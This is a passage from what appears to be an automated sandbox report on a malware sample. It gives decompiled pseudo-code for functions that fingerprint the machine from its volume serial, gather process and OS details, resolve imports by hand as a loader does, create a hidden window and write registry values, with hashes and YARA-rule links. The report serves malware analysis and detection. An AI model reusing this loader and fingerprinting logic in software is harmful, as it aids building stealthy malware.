						_t130 = E036092CB(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x361e688; // 0x33f0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E036091C9(_v1112);
								_t145 = _t130;
								 *0x361e740 = _t76;
								 *0x361e738 = E036091C9(_t145);
								L17:
								_push(_t145);
								_t80 = E03609B29( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x361b9c2);
								E03609F2E(0xe); // executed
								E03609F52(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0360A091(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0360A3D3(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0360A3D3(_t188, _t180, _t208); // executed
								}
								_t87 = E036097F2(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0360A091(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x361e688; // 0x33f0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0360FC2A(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x361e688; // 0x33f0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0360E249(_t183);
										}
										E036052A8( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x361e688; // 0x33f0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0360109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E036085BB( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x33f0228
									_t153 = _t51;
									L25:
									_t90 = E03605527(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x361e688; // 0x33f0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0360C29D(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x361e684; // 0x530f6c8
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x361e684; // 0x530f6c8
								 *((intOrPtr*)(_t109 + 0x30))();
								E03608600( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E03608600( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0360E291(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E036095C7(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0360BFF7(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E036085BB( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E03602BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x03604a0c
0x03604a19
0x03604a24
0x03604a29
0x03604a2b
0x03604a2e
0x03604a33
0x03604a36
0x03604a40
0x03604a42
0x03604a4f
0x03604a58
0x03604a58
0x03604a65
0x03604a80
0x03604a87
0x03604a89
0x03604a8e
0x03604a93
0x03604a99
0x03604aa8
0x03604ac7
0x03604ac9
0x03604acf
0x03604ad5
0x03604ada
0x03604ade
0x03604ae1
0x03604aeb
0x03604aed
0x03604aee
0x03604af9
0x03604afb
0x03604afe
0x03604b03
0x03604b0a
0x03604b5f
0x03604b5f
0x03604b64
0x03604bcb
0x03604bd0
0x03604bd2
0x03604bdc
0x03604be1
0x03604be1
0x03604bf6
0x03604bfb
0x03604bfd
0x03604c00
0x03604c02
0x00000000
0x00000000
0x03604c08
0x03604c12
0x03604c1b
0x03604c20
0x03604c23
0x03604c29
0x03604c2f
0x03604c37
0x03604c39
0x03604c3c
0x03604c3d
0x03604c42
0x03604c45
0x03604c48
0x03604c4a
0x03604c4e
0x03604c4e
0x03604c53
0x03604c56
0x03604c58
0x03604c5c
0x03604c5c
0x03604c63
0x03604c68
0x03604c6a
0x03604c6e
0x03604c70
0x03604c76
0x03604c7a
0x03604c7d
0x03604c7e
0x03604c83
0x03604c86
0x03604c8b
0x03604cb3
0x03604cb9
0x03604cc0
0x03604ccf
0x03604cd4
0x00000000
0x03604cd4
0x03604cc2
0x00000000
0x03604c8d
0x03604c8d
0x03604c92
0x03604c99
0x03604cde
0x03604cde
0x03604ce5
0x03604ce9
0x03604cea
0x03604cea
0x03604cf4
0x03604cf9
0x03604cfc
0x03604cfd
0x03604cff
0x03604d01
0x03604d06
0x03604d0d
0x03604d50
0x03604d0f
0x03604d14
0x03604d1c
0x03604d20
0x03604d2b
0x03604d36
0x03604d3e
0x03604d42
0x03604d4a
0x03604d4a
0x03604d0d
0x03604d56
0x03604d59
0x03604d5b
0x03604d61
0x03604d61
0x03604d63
0x03604d63
0x00000000
0x03604d63
0x03604c9b
0x03604c9b
0x03604ca1
0x03604ca3
0x03604ca8
0x03604ca8
0x03604caa
0x03604cd9
0x00000000
0x03604cd9
0x03604cac
0x03604ae5
0x03604ae5
0x00000000
0x03604ae5
0x03604c8b
0x03604b6a
0x03604b78
0x03604b8b
0x03604b90
0x03604b96
0x03604b98
0x03604bb0
0x03604bb5
0x03604bbe
0x03604bc4
0x00000000
0x03604bc4
0x03604ba0
0x03604ba9
0x00000000
0x03604ba9
0x03604b0c
0x03604b12
0x03604b14
0x03604b52
0x03604b54
0x00000000
0x00000000
0x03604b56
0x03604b5a
0x00000000
0x03604b5a
0x03604b16
0x03604b20
0x03604b2c
0x03604b37
0x03604b3e
0x03604b48
0x03604b4d
0x00000000
0x03604b4d
0x03604ae3
0x00000000
0x03604a67
0x03604a72
0x03604a78
0x03604a7a
0x03604d65
0x03604d65
0x03604d67
0x03604d6d
0x03604d6d
0x00000000
0x03604a7a

APIs

memset.MSVCRT ref: 03604A2E
lstrcpyW.KERNEL32 ref: 03604D20
lstrcatW.KERNEL32(00000000,?), ref: 03604D3E
lstrcatW.KERNEL32(00000000,00000000), ref: 03604D42
lstrcatW.KERNEL32(00000000,0361B994), ref: 03604D4A
lstrcpyW.KERNEL32 ref: 03604D50

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 8a526e06b416bd6178192d7d3d10812e4b6943403ebb461fb32bc32596f762fd
Instruction ID: 216ca5500acf6445e1e75808cbe5ef22edfbf7ab2efff377650e19dbc2d5e934
Opcode Fuzzy Hash: 8a526e06b416bd6178192d7d3d10812e4b6943403ebb461fb32bc32596f762fd
Instruction Fuzzy Hash: 3D91E275604300AFD329EB21D986F7BB3E9EB81310F18492DF6558B2C4EFB0D8058B86

Uniqueness

Uniqueness Score: -1.00%

Function 0360B78E, Relevance: 7.6, APIs: 5, Instructions: 83
stringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0360B78E(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				intOrPtr _t23;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				_t23 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t23 + 0xb0))( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E036095C7(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E036085BB( &_v16);
				_t33 = E0360C39D(_t43);
				E03609626( &(_t43[E0360C39D(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0360C39D(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0360D40B(_t43, E0360C39D(_t43) + _t40, 0);
			}

0x0360b78e
0x0360b797
0x0360b7a3
0x0360b7a9
0x0360b7ab
0x0360b7b3
0x0360b7c1
0x0360b7c6
0x0360b7d5
0x0360b7e0
0x0360b7ed
0x0360b807
0x0360b80c
0x0360b80e
0x0360b815
0x0360b825
0x0360b836
0x0360b840
0x0360b848
0x0360b84f
0x0360b852
0x0360b86f

APIs

memset.MSVCRT ref: 0360B7AB
lstrcpynW.KERNEL32(?,?,00000100), ref: 0360B7D5
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0360B807

Part of subcall function 03609626: _vsnwprintf.MSVCRT ref: 03609643

lstrcatW.KERNEL32(?,00000114), ref: 0360B840
CharUpperBuffW.USER32(?,00000000), ref: 0360B852

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: BuffCharInformationUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 455400327-0
Opcode ID: 6d0c25c1725ef58abe970a0cdd532820932323c0e187ca8f0e098ba1b6b54760
Instruction ID: 2142905b7de7fa1b9fe6ff99b6bde5923f4974072119af079385dd7ec60c7e21
Opcode Fuzzy Hash: 6d0c25c1725ef58abe970a0cdd532820932323c0e187ca8f0e098ba1b6b54760
Instruction Fuzzy Hash: CD2171B6A00318BFD708EBB4DC8AFEF77BCDB44210F10456AB505DB185EA749E448B64

Uniqueness

Uniqueness Score: -1.00%

Function 0360CF8F, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0360CF8F(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x361e688; // 0x33f0000
				GetCurrentProcess();
				_t11 = E0360B9EB(); // executed
				_t1 = _t29 + 0x1644; // 0x33f1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E03608FA4(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0x33f0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E03608FA4(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0360E3C1(_t3);
				_t7 = _t29 + 0x220; // 0x33f0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0360E3FC(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x0360cf92
0x0360cf94
0x0360cf9b
0x0360cfa3
0x0360cfad
0x0360cfad
0x0360cfb3
0x0360cfbc
0x0360cfc2
0x0360cfc4
0x0360cfc8
0x0360cfc8
0x0360cfcd
0x0360cfd3
0x0360cfe3
0x0360cfed
0x0360cff5
0x0360cff8
0x0360d004
0x0360d00a
0x0360d00f
0x0360d015
0x0360d01b
0x0360d021
0x0360d029

APIs

GetCurrentProcess.KERNEL32(?,?,033F0000,?,0360353A), ref: 0360CF9B
GetModuleFileNameW.KERNEL32(00000000,033F1644,00000105,?,?,033F0000,?,0360353A), ref: 0360CFBC
memset.MSVCRT ref: 0360CFED
GetVersionExA.KERNEL32(033F0000,033F0000,?,0360353A), ref: 0360CFF8
GetCurrentProcessId.KERNEL32(?,0360353A), ref: 0360CFFE

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: 3e6fe6eb7ecaa9b3bee4e34487ce1204ea815e146787c3053659aacd7c7e74b6
Instruction ID: 024677593e3a4f2df670973203107665f85cf6b11c89926c4a2e7bd0c80397d5
Opcode Fuzzy Hash: 3e6fe6eb7ecaa9b3bee4e34487ce1204ea815e146787c3053659aacd7c7e74b6
Instruction Fuzzy Hash: 6801D474901B049BD724FF30984ABDBBBE4EF84310F041C2EE4568B284EB74A501CB58

Uniqueness

Uniqueness Score: -1.00%

Function 036124A6, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E036124A6(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0360E0A4(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x036124ac
0x036124b4
0x036124c9
0x036124db
0x036124e7
0x036124ed
0x036124f2
0x036124fe
0x03612669
0x00000000
0x03612669
0x03612504
0x0361250d
0x0361251b
0x0361251e
0x0361252d
0x0361252d
0x03612534
0x03612542
0x03612545
0x0361255c
0x03612562
0x03612569
0x03612579
0x03612591
0x0361257b
0x03612583
0x03612583
0x03612594
0x03612598
0x036125a4
0x036125a8
0x036125ac
0x036125b0
0x036125bc
0x036125e7
0x036125ef
0x03612601
0x0361260d
0x036125be
0x036125c3
0x036125ce
0x036125da
0x036125da
0x03612616
0x0361261c
0x03612626
0x03612642
0x03612628
0x03612637
0x03612637
0x03612626
0x0361264a
0x03612653
0x03612653
0x03612661
0x00000000
0x03612661
0x0361256d
0x00000000
0x0361256d
0x00000000
0x03612545
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 036124C3
LoadLibraryA.KERNELBASE(00000000), ref: 0361255C

Strings

kernel32.dll, xrefs: 036124BE
GetProcAddress, xrefs: 036124CC

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 9f037265271cddf04ac5955c768032a964dc8fcc50f6bd1d8e1c374043ee6469
Instruction ID: d8857a54f89cb3bb1b17e3636206799aad8e8cc8649342855b9363749f28aec9
Opcode Fuzzy Hash: 9f037265271cddf04ac5955c768032a964dc8fcc50f6bd1d8e1c374043ee6469
Instruction Fuzzy Hash: 10619175910209EFDB00CF98C595BADBBF1FF08315F188599E815AB391D334AA91CF94

Uniqueness

Uniqueness Score: -1.00%

Function 03602EDA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03602EDA(void* __eflags) {
				struct _WNDCLASSEXA _v52;
				char _v80;
				char _v144;
				intOrPtr _t25;
				struct HWND__* _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				struct HWND__* _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t51;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t59;
				struct HINSTANCE__* _t64;

				_t25 =  *0x361e684; // 0x530f6c8
				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
				memset( &_v52, 0, 0x30);
				_t59 =  *0x361e688; // 0x33f0000
				E03609013(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
				_v52.style = 3;
				_v52.cbSize = 0x30;
				_v52.lpszClassName =  &_v144;
				_v52.lpfnWndProc = E03602E77;
				_v52.hInstance = _t64;
				if(RegisterClassExA( &_v52) == 0) {
					L6:
					_t34 =  *0x361e718; // 0x1501f4
					if(_t34 != 0) {
						_t39 =  *0x361e694; // 0x530f820
						 *((intOrPtr*)(_t39 + 0x28))(_t34);
					}
					L8:
					_t36 =  *0x361e694; // 0x530f820
					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
					return 0;
				}
				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
				 *0x361e718 = _t44;
				if(_t44 == 0) {
					goto L8;
				}
				_t45 =  *0x361e694; // 0x530f820, executed
				 *((intOrPtr*)(_t45 + 0x14))(_t44, 0);
				_t47 =  *0x361e694; // 0x530f820
				 *((intOrPtr*)(_t47 + 0x18))( *0x361e718);
				while(1) {
					_t50 =  *0x361e694; // 0x530f820
					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
					if(_t51 == 0) {
						goto L6;
					}
					if(_t51 == 0xffffffff) {
						goto L6;
					}
					_t53 =  *0x361e694; // 0x530f820
					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
					_t56 =  *0x361e694; // 0x530f820
					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
				}
				goto L6;
			}

0x03602ee3
0x03602ef2
0x03602ef9
0x03602efe
0x03602f18
0x03602f20
0x03602f2d
0x03602f34
0x03602f3a
0x03602f47
0x03602f50
0x03602fcd
0x03602fcd
0x03602fd4
0x03602fd7
0x03602fdc
0x03602fdc
0x03602fdf
0x03602fe7
0x03602fec
0x03602ff4
0x03602ff4
0x03602f77
0x03602f7a
0x03602f81
0x00000000
0x00000000
0x03602f85
0x03602f8a
0x03602f8d
0x03602f98
0x03602fba
0x03602fc1
0x03602fc6
0x03602fcb
0x00000000
0x00000000
0x03602fa0
0x00000000
0x00000000
0x03602fa6
0x03602fab
0x03602fb2
0x03602fb7
0x03602fb7
0x00000000

APIs

memset.MSVCRT ref: 03602EF9
RegisterClassExA.USER32(00000030), ref: 03602F4A
CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 03602F77

Strings

0, xrefs: 03602F2D

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: ClassCreateRegisterWindowmemset
String ID: 0
API String ID: 2030675355-4108050209
Opcode ID: 9beb200547da1788ea5c97279e0cc2982915604212176158969885d8e5c70086
Instruction ID: a2dde9653e6c0d4fdfac6933b579d21191bc58192020d8fd408ea9b217d6fb27
Opcode Fuzzy Hash: 9beb200547da1788ea5c97279e0cc2982915604212176158969885d8e5c70086
Instruction Fuzzy Hash: B4313CB1510208AFE704EFA8DDD9EAABBBCEB08344F485466F905D7299D731DD10CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03604D6E, Relevance: 6.4, APIs: 4, Instructions: 424
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E03604D6E(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t117;
				void* _t118;
				signed int _t120;
				CHAR* _t122;
				intOrPtr _t123;
				CHAR* _t125;
				WCHAR* _t128;
				intOrPtr _t131;
				intOrPtr _t135;
				WCHAR* _t136;
				intOrPtr _t140;
				WCHAR* _t141;
				CHAR* _t142;
				intOrPtr _t143;
				intOrPtr _t148;
				intOrPtr _t151;
				WCHAR* _t152;
				signed int _t157;
				WCHAR* _t158;
				intOrPtr _t161;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr _t168;
				signed int _t171;
				signed int _t176;
				WCHAR* _t180;
				char _t181;
				intOrPtr _t195;
				intOrPtr _t206;
				signed int _t210;
				char _t215;
				WCHAR* _t226;
				intOrPtr _t230;
				intOrPtr _t233;
				WCHAR* _t234;
				signed int _t235;
				signed int _t242;
				signed int _t244;
				signed int _t245;
				CHAR* _t246;
				intOrPtr _t258;
				intOrPtr _t266;
				void* _t267;
				void* _t269;
				intOrPtr _t270;
				void* _t276;
				intOrPtr _t278;
				void* _t295;
				void* _t296;
				intOrPtr _t302;
				WCHAR* _t322;
				CHAR* _t323;
				void* _t325;
				WCHAR* _t326;
				intOrPtr _t328;
				WCHAR* _t330;
				signed int _t333;
				intOrPtr* _t335;
				void* _t354;

				_t354 = __fp0;
				_t335 = (_t333 & 0xfffffff8) - 0x26c;
				_t117 =  *0x361e688; // 0x33f0000
				_t242 = 0;
				_t325 = __ecx;
				_v620 = 0;
				if(( *(_t117 + 0x1898) & 0x00000082) == 0) {
					L8:
					_t118 = E0360B78E(0x361b9c0,  &_v516); // executed
					_t13 = _t118 + 1; // 0x1
					E0360A853( &_v556, _t13, 0);
					_t295 = 0x64;
					_t120 = E0360A457( &_v556, _t295);
					 *0x361e748 = _t120;
					if(_t120 != 0) {
						_push(0x4e5);
						_t296 = 0x10;
						 *0x361e680 = E0360E1C7(0x361b9c4, _t296);
						 *_t335 = 0x610;
						_t122 = E036095C7(0x361b9c4);
						_push(_t242);
						_push(_t122);
						_v612 = _t122;
						_t123 =  *0x361e688; // 0x33f0000
						_t125 = E036092CB(_t123 + 0x228);
						_t315 = _t125;
						_v616 = _t125;
						E036085BB( &_v612);
						_t128 = E0360B24F(_t125);
						__eflags = _t128;
						if(_t128 != 0) {
							_t234 = E03608955(_t315, 1, _t242, _t242);
							__eflags = _t234;
							if(_t234 != 0) {
								_t235 = E0360A2C9(_t234);
							} else {
								_t235 = _t242;
							}
							 *((intOrPtr*)(_t325 + 0x10)) = _t235;
							 *_t325 = 3;
						}
						E03608600( &_v616, 0xfffffffe);
						_t131 =  *0x361e688; // 0x33f0000
						_t21 = _t131 + 0x114; // 0x33f0114
						E03604A0C( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x110)))), _t21, _t354, _t325, _t242, _t242);
						_t258 =  *0x361e688; // 0x33f0000
						__eflags =  *((intOrPtr*)(_t258 + 0x101c)) - 3;
						if( *((intOrPtr*)(_t258 + 0x101c)) == 3) {
							L19:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t325;
							_v576 =  *((intOrPtr*)(_t258 + 0x214));
							_t135 =  *0x361e680; // 0x530fb78
							_t136 =  *(_t135 + 8);
							__eflags = _t136;
							if(_t136 != 0) {
								 *_t136(_t242, _t242, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _t242;
							E0360E2D1(_t354,  &_v576); // executed
							_pop(_t258);
							_t140 =  *0x361e6b4; // 0x530f870
							_t141 =  *((intOrPtr*)(_t140 + 0x10))(_t242, _t242,  &_v620);
							__eflags = _t141;
							if(_t141 == 0) {
								E0360E2D1(_t354,  &_v588);
								_t230 =  *0x361e6b4; // 0x530f870
								_pop(_t258);
								 *((intOrPtr*)(_t230 + 0xc))(_v632);
							}
							__eflags =  *0x361e73c;
							if( *0x361e73c <= 0) {
								goto L37;
							} else {
								_t163 =  *0x361e680; // 0x530fb78
								__eflags =  *((intOrPtr*)(_t163 + 8)) - _t242;
								if( *((intOrPtr*)(_t163 + 8)) != _t242) {
									_t226 =  *(_t163 + 0xc);
									__eflags = _t226;
									if(_t226 != 0) {
										 *_t226(_v580);
									}
								}
								_t164 =  *0x361e688; // 0x33f0000
								_t258 =  *((intOrPtr*)(_t164 + 0x214));
								__eflags = _t258 - 3;
								if(_t258 == 3) {
									goto L37;
								} else {
									__eflags =  *((intOrPtr*)(_t164 + 4)) - 6;
									if( *((intOrPtr*)(_t164 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t164 + 0x101c)) - 3;
										if( *((intOrPtr*)(_t164 + 0x101c)) != 3) {
											goto L37;
										}
										E036049A6();
										asm("stosd");
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t168 =  *0x361e684; // 0x530f6c8
										 *((intOrPtr*)(_t168 + 0xd8))( &_v608);
										_t266 = _v602;
										_t244 = 0x3c;
										_t171 = _t266 + 0x00000002 & 0x0000ffff;
										_v596 = _t171;
										_v620 = _t171 / _t244 + _v604 & 0x0000ffff;
										_t176 = _t266 + 0x0000000e & 0x0000ffff;
										_v624 = _t176;
										_v628 = _t176 / _t244 + _v604 & 0x0000ffff;
										_t180 = E036085EA(0x1000);
										_v632 = _t180;
										_pop(_t267);
										__eflags = _t180;
										if(_t180 != 0) {
											_t181 = E0360109A(_t267, 0x148);
											_t302 =  *0x361e688; // 0x33f0000
											_v636 = _t181;
											_push(_t302 + 0x648);
											_push(0xa);
											_push(7);
											_t269 = 2;
											E03609013(_t269,  &_v572);
											_t270 =  *0x361e688; // 0x33f0000
											_t330 = E036060C5( &_v572, _t270 + 0x228, 1,  *((intOrPtr*)(_t270 + 0xa0)));
											_v616 = _t330;
											__eflags = _t330;
											if(_t330 != 0) {
												_push(_v624 % _t244 & 0x0000ffff);
												_push(_v628 & 0x0000ffff);
												_push(_v596 % _t244 & 0x0000ffff);
												_push(_v620 & 0x0000ffff);
												_push(_t330);
												_push( &_v572);
												_t195 =  *0x361e688; // 0x33f0000
												__eflags = _t195 + 0x1020;
												E03609626(_v632, 0x1000, _v636, _t195 + 0x1020);
												E036085BB( &_v636);
												E0360A8F7(_v632, 0, 0xbb8, 1); // executed
												E03608600( &_v616, 0xfffffffe);
											}
											E03608600( &_v632, 0xfffffffe);
										}
										goto L42;
									}
									__eflags = _t258 - 2;
									if(_t258 != 2) {
										goto L37;
									}
									E036049A6();
									asm("stosd");
									asm("stosd");
